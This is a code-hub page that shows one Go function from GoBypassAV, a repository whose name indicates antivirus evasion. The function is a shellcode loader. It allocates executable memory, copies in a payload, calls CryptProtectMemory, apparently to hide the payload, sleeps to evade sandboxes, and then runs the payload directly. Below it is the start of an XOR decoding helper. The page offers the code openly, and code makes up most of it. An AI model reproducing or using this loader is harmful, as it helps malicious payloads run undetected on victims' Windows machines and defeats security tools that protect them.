MCPcopy Create free account
hub / github.com/TideSec/GoBypassAV / exe

Function exe

Go_Windows_API/12-ProcCryptProtectMemory/main.go:29–43  ·  view source on GitHub ↗
(charcode []byte)

Source from the content-addressed store, hash-verified

27)
28
29func exe(charcode []byte) {
30 addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
31 if err != nil && err.Error() != "The operation completed successfully." {
32 syscall.Exit(0)
33 }
34 time.Sleep(2 * time.Second)
35 _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
36 procCryptProtectMemory.Call(uintptr(addr), uintptr(len(charcode)), uintptr(0x00))
37 if err != nil && err.Error() != "The operation completed successfully." {
38 syscall.Exit(0)
39 }
40
41 time.Sleep(2 * time.Second)
42 syscall.Syscall(addr, 0, 0, 0, 0)
43}
44
45func Xor(src string) string {
46 var XorKey = []byte{0x74, 0x69, 0x64, 0x65, 0x62, 0x79, 0x70, 0x61, 0x73, 0x73} //tidesec

Callers 1

mainFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected